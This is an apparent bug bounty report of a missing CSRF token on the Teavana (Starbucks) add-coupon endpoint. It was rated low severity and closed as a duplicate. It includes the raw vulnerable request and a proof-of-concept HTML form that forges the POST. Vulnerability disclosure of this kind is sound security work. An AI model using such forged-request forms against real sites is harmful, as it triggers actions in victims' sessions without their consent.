Missing CSRF Token On Add Coupon To Basket
Low
S
Starbucks
Submitted None
Actions:
Reported by
apapedulimu
Vulnerability Details
Technical details and impact analysis
Hi,
When Adding Coupun It's missing CSRF Token, and at this time, i use `BOGO50` Coupun to reproduce it.
__Vuln Request__
```
POST /on/demandware.store/Sites-Teavana-Site/default/Home-AddCouponToBasket?couponcode=BOGO50&format=ajax HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: <some cookie>
Connection: close
Upgrade-Insecure-Requests: 1
```
__PoC Code__
```
<html>
<body>
<form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Home-AddCouponToBasket?couponcode=BOGO50&format=ajax" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Thanks,
If you need video, i will create one !
Report Details
Additional information and metadata
State
Closed
Substate
Duplicate
Submitted
Weakness
Cross-Site Request Forgery (CSRF)